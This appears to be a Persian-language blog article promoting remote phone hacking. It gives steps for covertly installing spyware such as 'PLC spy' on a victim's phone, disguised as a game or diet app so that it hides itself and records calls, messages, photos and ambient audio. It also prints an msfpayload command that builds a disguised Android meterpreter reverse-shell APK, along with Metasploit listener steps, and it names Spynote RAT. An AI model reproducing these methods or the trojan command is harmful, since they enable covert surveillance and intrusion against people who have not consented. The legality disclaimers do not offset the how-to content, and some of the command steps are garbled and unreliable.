هک گوشی با کامپیوتر از راه دور و بدون دسترسی به گوشی هدف را خودتان انجام دهید

هک گوشی با کامپیوتر از راه دور

برنامه هک اینستاگرام برای اندروید
برنامه هک اینستاگرام برای اندروید
آگوست 13, 2021
نرم افزار هک تلگرام بدون دسترسی به گوشی
نرم افزار هک تلگرام بدون دسترسی به گوشی
آگوست 18, 2021

هک گوشی با کامپیوتر از راه دور

hack phone by computer

hack phone by computer

هک گوشی با کامپیوتر از راه دور معمولا کار ساده ای نیست. بیشتر افرادی که می خواهند این کار را انجام  دهند برنامه نویس ها و هکر های حرفه ای هستند. به این دلیل که کد نویسی با استفاده از کامپیوتر می تواند به شدت برای آن ها راحت باشد. علاوه بر این به جای این که یک گوشی را با گوشی هوشمند دیگری هک کنید که گزینه های کمتری را در اختیار شما قرار می دهد، می توانید بخش مهمی از گوشی هک شده را با کامپیوتر در اختیار داشته باشید. در این مقاله می خواهیم در مورد روش های هک گوشی با کامپیوتر از راه دور صحبت کنیم.

آیا هک گوشی با کامپیوتر از راه دور ممکن است؟

سوال بسیاری از افراد همین است!. دقت داشته باشید که افرادی که این سوال را می پرسند نباید به سراغ هک بروند. به این دلیل که هک کردن فرایندی غیر قانونی است. با توجه به این موضوع باید تا جایی که می توانید از این روش ها فاصله بگیرید. تنها زمان های خاصی وجود دارند که دیدن اطلاعات افراد دیگر ممکن است مشکل نداشته باشد. به عنوان مثال افرادی که می خواهند فرزندان زیر 18 سال خود را نظارت کنند. یا کارفرمایانی که می خواهند کارمند خود را نظارت کنند می توانند از این روش ها استفاده کنند.

نکته ی مهم این است که هک گوشی با کامپیوتر از راه دور نه تنها ممکن است، بلکه می تواند قدرتمند تر هم باشد. بسیاری از افراد فکر می کنند که یک گوشی هوشمند را فقط باید با گوشی هک کرد. اما کامپیوتر ها می توانند ابزار های قدرتمند تری در این کار باشند. به این دلیل که هم سیستم های پردازنده ی قوی تری دارند و هم حافظه ی بیشتری برای ثبت اطلاعات. علاوه بر این بسیاری از زبان های برنامه نویسی که مورد استفاده ی هکر ها است در استفاده از کامپیوتر بروز پیدا می کنند.

چگونه می توان هک گوشی با کامپیوتر از راه دور را انجام داد؟

برای این که این کار را انجام دهید باید حتما به این موضوع توجه داشته باشید که این کار هر کسی نیست. افراد زیادی هستند که سال ها برنامه نویس هستند اما استعداد هکری موضوع دیگری است. اما بسیاری از افراد جهان حتی کوچکترین اطلاعاتی در مورد برنامه نویسی ندارند. بنابراین باید راه دیگری را برای هک کردن هدف خود استفاده کنند.

افرادی که برنامه نویس یا هکر نیستند می توانند با استفاده از نرم افزار های طراحی شده توسط سایر هکر ها، هدف خود را هک کنند. این نرم افزار ها توسط برنامه نویس هایی که هکر هم هستند طراحی شده است. با این نرم افزار ها بدون این که هیچ مهارت هک یا برنامه نویسی داشته باشید می توانید هک خود را انجام دهید.

در زیر به شما برنامه هایی معرفی می شود که می توانید آن را بر روی ویندوز یا سایر سیستم عامل های کامپیوتری امتحان کنید.

هک کردن گوشی با استفاده از کامپیوتر

در این مقاله ، تمرکز اصلی ما یادگیری نحوه هک کردن گوشی های اندرویدی با پیروی از چندین مرحله است که درک و پیاده سازی آنها بسیار آسان است.

لطفاً توجه داشته باشید که این مقاله فقط برای هدف آگاهی است. خوب است بدانید که چگونه گوشی اندروید را هک کنید ، اما هک هر گوشی اندرویدی بدون رضایت شخص جرم محسوب می شود.

بنابراین ، ما از خوانندگان خود می خواهیم که از این مقاله فقط برای آگاهی از هک گوشی اندروید استفاده کنند و بدون داشتن مجوزهای مناسب توسط مالک آن را عملا اعمال نکنند.

قبل از ادامه بحث در مورد هر موضوع خاص ، آگاهی از اصول اولیه یا اصطلاحات مورد استفاده در آن موضوع الزامی است. به همین ترتیب ، قبل از اینکه بدانیم چگونه گوشی های اندرویدی را هک کنیم ، لازم است بدانیم منظور از کلمه هک چیست و همچنین باید بدانیم منظور از اصطلاح هک نیز چیست.

hack phone by computer

هک کردن با استفاده از کامپیوتر می تواند برای همه قابل انجام باشد.

هک چیست؟

“دسترسی غیرمجاز به داده های یک سیستم یا رایانه”

به زبان ساده ، کلمه هک به معنای دستیابی به دسترسی غیر مجاز است.

“هک را می توان فرآیندی تعریف کرد که طی آن دسترسی غیرمجاز به سیستم شخص دیگر ، یعنی بدون رضایت وی انجام می شود”

بنابراین ، اصطلاح هک فرآیندی است که طی آن شخص می تواند به سیستم ، رایانه یا حتی تلفن دسترسی غیرمجاز داشته باشد.

بنابراین ، ما امیدواریم که اصطلاح هک و هک برای همه خوانندگان واضح باشد. حالا باید ببینیم چه کسی به عنوان هکر شناخته می شود.

هکرها افرادی هستند که از هک کردن یک سیستم آگاهی دارند و عمدتا با یا بدون رضایت به آن سیستم نفوذ می کنند. اکنون ، شما باید فکر کنید که چرا ما “با رضایت” را ذکر می کنیم. این امر با مشاهده انواع هکرها قابل درک خواهد بود.

اساساً ، ما 3 نوع هکر بر اساس هدف هک آنها داریم:

هکرهای کلاه سفید

افسران امنیتی هستند که توسط شرکت های مختلف استخدام می شوند . عمدتا برای بررسی نرم افزار یا سیستم های خود از نظر آسیب پذیری های موجود فعالیت می کنند. هکرهای کلاه سفید با مجوز به سیستم نفوذ می کنند و سعی می کنند آسیب پذیری ها را بیابند .سپس آن را به شرکت گزارش دهند تا قبل از سوء استفاده هر کسی از این آسیب پذیری ها Patch  کند.

هکرهای کلاه سیاه

اینها اساساً افراد بدی هستند!. آنها از دانش هکری خود برای نفوذ به سیستم ها به منظور آسیب رساندن به شرکت یا افراد یا با انگیزه سرقت پول استفاده می کنند. هکرهای Black Hat نیز این آسیب پذیری ها را پیدا می کنند . اما با دسترسی غیرمجاز. همچنین ، آنها از این آسیب پذیری ها برای بدنامی شرکت استفاده می کنند.

هکرهای کلاه خاکستری

اینها افراد بین هکرهای کلاه سفید و هکرهای کلاه خاکستری هستند. آنها همچنین از دانش خود برای یافتن آسیب پذیری در سیستم ها استفاده می کنند. با این حال ، آنها گاهی هم دست به اعمالی می زنند که ممکن است بر علیه ی دولت یا یک کشور باشد.

هک با استفاده از کامپیوتر

در این بخش نحوه هک گوشی های اندرویدی با استفاده از رایانه را از راه دور یاد می گیریم. در اینجا ، ما قصد داریم از ابزارهای هک گوشی اندروید استفاده کنیم. بنابراین اجازه دهید نگاهی به روش های مختلف بیندازیم.

روش -1 -> استفاده از FoneMonitor

حساب خود را در Fonemonitor تنظیم کنید
همانطور که گفته شد تمام مراحل نصب را انجام دهید
قربانی را مجبور کنید آن برنامه را نصب کند تا بتوانید تلفن اندرویدی او را هک کنید
دستگاه را در رایانه خود کنترل کنید

روش -2 -> استفاده از Google Maps

خدمات مکان را در دستگاه مورد نظر روشن کنید.
برنامه را اجرا کنید
در منو انتخاب کنید
مکان خود را با پیکربندی مورد نظر به اشتراک بگذارید
اکنون می توانید مکان مورد نظر را دریافت کنید.

روش -3 -> استفاده از نرم افزار plc spy.

شما باید یک حساب کاربری ایجاد کنید.
برنامه را روی تلفن اندرویدی که هدف است نصب کنید.
اکنون نظارت را بر روی لپ تاپ خود شروع کنید.

به طور مشابه ، می توانید از ابزارهای مختلف دیگر برای هک کردن تلفن های Android از راه دور استفاده کنید. برخی از این ابزارها دارای ویژگی اضافه ای هستند که به وسیله آن می توانید دستگاه مورد نظر را رصد کرده و نوع اطلاعات مورد نیاز خود را از تلفن اندرویدی هدف استخراج کنید. می توانید ابزارهای بیشتری را جستجو کنید ، اما به یاد داشته باشید که بدون رضایت هک نکنید ، در غیر این صورت جرم محسوب می شود.

هک از راه دور و تنها با داشتن شماره تلفن

از قابلیت های منحصر به فرد نرم افزار plc spy می توان به قابلیت هک شماره تلفن و هک گوشی از راه دور  بدون دسترسی به گوشی هدف اشاره کرد.

شما می توانید این نرم افزار را با ظاهر یک برنامه کاربردی مانند یک بازی یا اپلیکیشن رژیم و یا هر چیزی که مدنظرتان باشد برای فرد هدف ارسال کنید. سپس از او بخواهید برروی لینک ارسالی شما کلیک کند.

به محض کلیک هدف برروی لینک ، برنامه به طور خودکار نصب شده و همان لحظه از روی گوشی پنهان می گردد.

این برنامه قابلیت هایی همچون ضبط مکالمات ، نمایش تصاویر موجود در گالری ، نمایش مخاطبین و پیام های کوتاه ، کنترل موقعیت مکانی ، شنود صدای محیط اطراف و … را ارائه می دهد.

 

جهت کسب اطلاعات بیشتر و آموزش کار با نرم افزار plc spy می توانید برروی لینک آبی رنگ زیر کلیک نمایید.

هک با شماره موبایل با نرم افزار plc spy

 

چگونه می توان گوشی اندروید را با استفاده از لینوکس کالی هک کرد؟

اکنون ما قصد داریم از محبوب ترین ابزار Kali Linux استفاده کنیم. بنابراین در زیر این مبحث ، ما قصد داریم نحوه هک کردن گوشی اندروید با استفاده از لینوکس کالی را بیاموزیم. Kali Linux یک ابزار بسیار مفید است و دارای ویژگی های زیادی است و استفاده از آن بسیار آسان است. حالا بیایید نحوه استفاده از لینوکس کالی برای هک کردن گوشی های اندرویدی را بیاموزیم.

مراحل هک کردن با استفاده از این ابزار مشهور

مرحله 1 -> ابتدا ، باید کالی را گسترش دهید ، مراحل زیر را دنبال کنید:

ترمینال را باز کنید
فایل Trojan.apk را ایجاد کنید
نوع: msfpayload android/meterpreter/reverse_tcp LHOST = 192.168.0.4 R> /root/Upgrader.apk

مرحله 2 -> یک ترمینال دیگر باز کنید.

اکنون باید ابزار Metasploit را با دستور مناسب بارگذاری کنید

مرحله 3 -> اکنون باید یک شنونده تنظیم کنید.

نوع: از exploit/multi/handler استفاده کنید
نوع بعدی: تنظیم بار بار android/meterpreter/reverse_tcp
در نهایت ، میزبان را تنظیم کنید.

hack phone by computer

هک کردن با کالی لینوکس بسیار مشهور شده است

مرحله 4 -> بعد ، شما باید از آن استفاده کنید

هنگام استفاده از Metasploit در لینوکس کالی ، ممکن است دستورات بیشتری وجود داشته باشد. بنابراین می توان گفت Metasploit ابزاری بسیار قدرتمند برای هک گوشی های اندرویدی است. همانطور که بر اساس دستورات است ، بنابراین تنها چیزی که نیاز دارید این است که دستورات مناسب را تایپ کنید.

همچنین ، نه تنها از Metasploit برای هک کردن گوشی های اندرویدی استفاده می شود بلکه اهداف بیشتری را نیز انجام می دهد.

چگونه تلفن اندرویدی متصل به یک روتر Wi-Fi را هک کنیم؟

اکنون ما نحوه هک کردن تلفن اندرویدی متصل به همان روتر Wi-Fi را خواهیم دید. اجازه دهید نگاهی به روشهای مختلف بیاندازیم.

روش 1 – استفاده از Metasploit

همانطور که در موضوع فرعی قبلی ذکر شد ، می توان از Metasploit برای هک و گوشی های اندرویدی استفاده کرد. در حال حاضر ، از همین ابزار می توان برای هک کردن تلفن اندرویدی متصل به یک روتر Wi-Fi نیز استفاده کرد. همانطور که می دانید ، تنها کاری که باید انجام دهید این است که دستورات مناسب را پیگیری کرده و راه اندازی کنید ، و خوب پیش می روید.

می توانید از دستورات ذکر شده در بالا استفاده کنید ، یا می توانید به راحتی دستورات را در اینترنت جستجو کنید.

روش 2

دومین کاری که می توانید انجام دهید این است که کنترل شبکه را به دست آورید. اجازه دهید بفهمیم که چرا دسترسی به شبکه مفید است. از آنجا که دستگاه های مختلف به روتر متصل هستند ، بنابراین ، هنگامی که به روتر یا شبکه دسترسی پیدا کردید ، می توانید به راحتی تلفن اندرویدی متصل به همان روتر را هک کنید.

به غیر از اینها ، روشهای مختلف دیگری نیز وجود دارد که خارج از حوصله این مقاله است. می توانید در مورد آنها تحقیق کنید. برای درک روشهای هک کردن تلفن اندرویدی متصل به یک روتر Wi-Fi ، کافی است بیشتر جستجو کرده و یادگیری را ادامه دهید.

چگونه گوشی اندروید را از راه دور هک کنیم؟

بیایید نحوه هک کردن تلفن های اندرویدی از راه دور را بیاموزیم. بنابراین روشهای مختلف به شرح زیر است:

روش 1

یکی از راه ها این است که اگر بتوانید دوربین جلویی گوشی اندرویدی را هک کنید ، می توانید تمام عکس های گرفته شده توسط قربانی را در تلفن ضبط کنید.هک گوشی با کامپیوتر از راه دور با استفاده از برنامه نویسی انجام می شود. به این ترتیب می توانید تلفن Android را از راه دور به راحتی هک کنید. این روش نیاز به پیاده سازی برخی ابزارها یا دستوراتی دارد که می توانید در مورد آنها بیشتر به صورت آنلاین بخوانید.

روش 2

راه دیگر هک کردن تلفن های اندرویدی از راه دور استفاده از ابزارهای خاصی است. یکی از این ابزارها که برای جاسوسی استفاده می شود ، Spynote Rat است.علاوه بر این می توانید از نرم افزار PLC spy که بسیار معتبر است استفاده کنید.

استفاده کردن از نرم افزار های جاسوسی می تواند برای شما گران باشد. اما استفاده کردن از PLC spy که توسط سامانه کنترل فرزندان طراحی شده است می تواند با صرفه ی اقتصادی بالا خدمات با کیفیت تری را هم به شما ارائه کند.

 روش های جلوگیری از هک

تا الان یاد گرفتید که چگونه می توان با استفاده از ابزار های مختلفی گوشی ها را هک کرد. علاوه بر این ابزار های دیجیتال دیگر هم وجود دارند که می توانید با استفاده از آن ها فرایند هک کردن را انجام دهید. حالا که این موضوع را متوجه شده اید باید بدانید که خودتان هم امنیت خود را بالا ببرید. یکی از مهمترین مواردی که مردم از آن بی خبرند، مورد امنیتی زیر است. سعی کنید آن را تا حد امکان رعایت کند تا دچار هک نشوید.

hack phone by computer

اگر فایل های مخلتف دریافت را با استفاده از نرم افزار رمز گذاری کنید احتمال هک را به شدت کاهش می دهید.

رمزگذاری فایل ها هنگام ذخیره و انتقال

وقتی فایلهای مهم مایکروسافت را با دیگران به اشتراک می گذارید یا آنها را در دستگاه ، USB یا پلتفرم ابری خود ذخیره می کنید ، همیشه آنها را رمزگذاری کنید. رمزگذاری به معنای استفاده از الگوریتم های ریاضی برای قفل کردن داده ها با یک کلید رمزنگاری است. رمزگذاری داده های متن ساده را مخدوش می کند و محافظت از آن را در برابر احزاب ناخواسته بدون کلید احراز هویت نامفهوم می کند.

به طوری که ، حتی اگر شخصی به آن فایل ها دسترسی پیدا کند ، نمی تواند آنها را باز کرده و بخواند. همه فایل های مایکروسافت (مانند Word ، Excel ، Access ، PowerPoint) دارای این گزینه هستند.

به عنوان مثال ، برای رمزگذاری یک فایل در Excel:

از بالای گوشه سمت چپ روی File کلیک کنید.
اطلاعات را انتخاب کنید.
بر روی Protect Workbook (یا Protect Document ، Presentation و غیره ، مطابق نوع فایل) کلیک کنید.
رمزگذاری با رمز را انتخاب کنید.

پس از تعیین گذرواژه ، هر کسی که بخواهد به این فایل دسترسی پیدا کند به این رمز نیاز دارد. هنگامی که چنین پرونده محافظت شده ای را برای هرکسی ارسال می کنید ، مطمئن شوید که رمز عبور را از طریق تلفن ، ایمیل جداگانه یا هر کانال ارتباطی دیگر به گیرنده ارائه دهید.
از این ابزارها برای رمزگذاری انواع دیگر فایل ها/پوشه ها استفاده کنید

 

دیدگاهتان را بنویسید